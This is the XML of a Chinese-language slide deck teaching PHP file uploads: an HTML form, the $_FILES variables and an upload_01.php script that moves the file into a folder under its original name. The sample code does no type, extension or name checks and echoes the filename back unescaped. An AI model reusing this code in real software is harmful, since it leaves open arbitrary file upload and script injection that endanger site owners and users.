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3" r:id="rId4"/>
    <p:sldId id="275" r:id="rId5"/>
    <p:sldId id="286" r:id="rId6"/>
    <p:sldId id="287" r:id="rId7"/>
    <p:sldId id="291" r:id="rId8"/>
    <p:sldId id="292" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="288" r:id="rId11"/>
    <p:sldId id="289" r:id="rId12"/>
    <p:sldId id="290" r:id="rId13"/>
    <p:sldId id="296" r:id="rId14"/>
    <p:sldId id="284" r:id="rId15"/>
    <p:sldId id="294" r:id="rId16"/>
    <p:sldId id="295" r:id="rId17"/>
    <p:sldId id="297" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="293" r:id="rId20"/>
    <p:sldId id="300" r:id="rId21"/>
    <p:sldId id="301" r:id="rId22"/>
    <p:sldId id="299" r:id="rId23"/>
    <p:sldId id="302" r:id="rId2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34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72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5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52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46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58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35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89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96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68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79EE0-0170-4DCB-A082-1FE72872B39F}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2018/1/5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AA7A1-1EF4-417B-B55B-07AF7665F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87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php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>程式設計</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檔案上傳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7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4" y="4210495"/>
            <a:ext cx="6895070" cy="19348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92862" y="3738604"/>
            <a:ext cx="16081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upload_01.php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9652" y="3672702"/>
            <a:ext cx="153362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index_01.html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13" y="1271193"/>
            <a:ext cx="3982643" cy="2114284"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="內容版面配置區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92862" y="1271193"/>
            <a:ext cx="3772405" cy="200591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3058204" y="3434974"/>
            <a:ext cx="1307850" cy="7825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5016843" y="3064476"/>
            <a:ext cx="345989" cy="60822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14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1728" y="245762"/>
            <a:ext cx="153362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index_01.html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1728" y="948690"/>
            <a:ext cx="824195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&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    &lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    &lt;meta charset="utf-8"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    &lt;p align="center"&gt;&lt;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="title.jpg"&gt;&lt;/p&gt;  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    &lt;p align="center"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>歡迎使用檔案上傳服務，您只可以上傳一個檔案。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&lt;/p&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    &lt;p align="center"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      &lt;form 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method="post"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action="upload_01.php" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>="multipart/form-data"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        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type="hidden" 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name="MAX_FILE_SIZE" value="1048576"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        &lt;input type="file" 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name="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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>size="50"&gt;&lt;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&lt;input type="submit" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        &lt;input type="reset" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>重新設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>    &lt;/P&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>  &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/html&gt;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54" y="138670"/>
            <a:ext cx="5076803" cy="26951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67624" y="2292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前端程式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3797" y="6078150"/>
            <a:ext cx="3402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1048576[bytes]=1024*1024=1MB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59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7" t="11455" r="31721" b="4198"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="90615" y="1082180"/>
            <a:ext cx="8866665" cy="54751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9491" y="229285"/>
            <a:ext cx="16081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upload_01.php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內容版面配置區 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1180" r="13879" b="19490"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4718298" y="81087"/>
            <a:ext cx="4238982" cy="21364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867624" y="22928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後端處理程式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7475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091" y="556736"/>
            <a:ext cx="858382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dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定用來存放檔案的資料夾名稱及檔名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>upload_dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> =  "./upload files/";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>upload_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>upload_dir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dirty="0"/>
              <a:t> $to = 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iconv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>("UTF-8", "Big5",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$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>["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dirty="0"/>
              <a:t>"]["name"]);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54345"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="107091" y="1565189"/>
            <a:ext cx="4561510" cy="50804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67086" y="2156939"/>
            <a:ext cx="447988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http://php.net/manual/zh/function.iconv.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="向下箭號圖說文字 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="556736"/>
            <a:ext cx="1070167" cy="62127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輸入的檔案是中文名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>稱</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="弧形箭號 (上彎) 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604575" y="1398132"/>
            <a:ext cx="807308" cy="167057"/>
          </a:xfrm>
          <a:prstGeom prst="curvedUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 31962"/>
              <a:gd name="adj2" fmla="val 78515"/>
              <a:gd name="adj3" fmla="val 603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78067" y="4828742"/>
            <a:ext cx="631056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$_FILES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"]["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name"]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：上傳檔案的原始名稱。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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dirty="0" smtClean="0"/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>type"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：上傳的檔案類型。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>size"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：上傳的檔案原始大小。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：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上傳檔案後的暫存資料夾位置。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>$_FILES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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dirty="0" smtClean="0"/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>error"]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>如果檔案上傳有錯誤，可以顯示錯誤代碼。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696465" y="4122057"/>
            <a:ext cx="319216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後端的處理程式可以透過下列變數取得上傳檔案的資訊：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30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944690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Superglobals</a:t>
            </a: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::$_FILES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http://php.net/manual/en/language.variables.superglobals.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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097105"/>
            <a:ext cx="6386482" cy="45138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092" y="1450774"/>
            <a:ext cx="6091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打開來看看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http://www.w3school.com.cn/php/php_superglobals.asp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01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365127"/>
            <a:ext cx="9144000" cy="9446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Superglobals</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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::$_FILES</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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http://php.net/manual/en/features.file-upload.post-method.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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92" y="1383055"/>
            <a:ext cx="6487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global $_FILES will contain all the uploaded file information.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74" y="1825625"/>
            <a:ext cx="8061660" cy="45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365127"/>
            <a:ext cx="9144000" cy="9446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Superglobals</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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::$_FILES</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US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http://php.net/manual/en/features.file-upload.post-method.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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92" y="1383055"/>
            <a:ext cx="6487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global $_FILES will contain all the uploaded file information.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740" y="1752386"/>
            <a:ext cx="7064852" cy="48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0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904" y="1120660"/>
            <a:ext cx="8073080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dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將上傳的檔案由暫存資料夾移至指定的資料夾</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>move_uploaded_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>($_FILES["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>myfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"]["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"], $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>upload_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "&lt;strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案上傳成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/strong&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>顯示檔案資訊		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echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案名稱：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"]["name"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>暫存檔名：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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"] . "&lt;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檔案大小：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"]["size"] . "Bytes&lt;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檔案類型：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"]["type"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";						</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "&lt;p&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JavaScript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>繼續上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;&lt;/p&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      {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檔案上傳失敗 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>("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"]["error"] . ")&lt;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"&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>javascript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>重新上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      }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64" y="128821"/>
            <a:ext cx="5185117" cy="27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7839" y="1639644"/>
            <a:ext cx="8073080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dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將上傳的檔案由暫存資料夾移至指定的資料夾</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if (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move_uploaded_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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[“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”][“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tmp_name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”]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/>
              <a:t>, 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upload_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "&lt;strong&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案上傳成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/strong&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>顯示檔案資訊		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echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案名稱：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"]["name"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>暫存檔名：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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"] . "&lt;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檔案大小：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"]["size"] . "Bytes&lt;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檔案類型：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"]["type"] . "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&gt;";						</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        echo "&lt;p&gt;&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>JavaScript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>繼續上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;&lt;/p&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      {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檔案上傳失敗 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(" .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$_FILES["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"]["error"] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>. ")&lt;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"&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>javascript:history.back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>()'&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>重新上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>&lt;/a&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>      }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="迴轉箭號 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654379" y="1639644"/>
            <a:ext cx="2603156" cy="313037"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 27174"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 35869"/>
              <a:gd name="adj4" fmla="val 4375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663" y="125551"/>
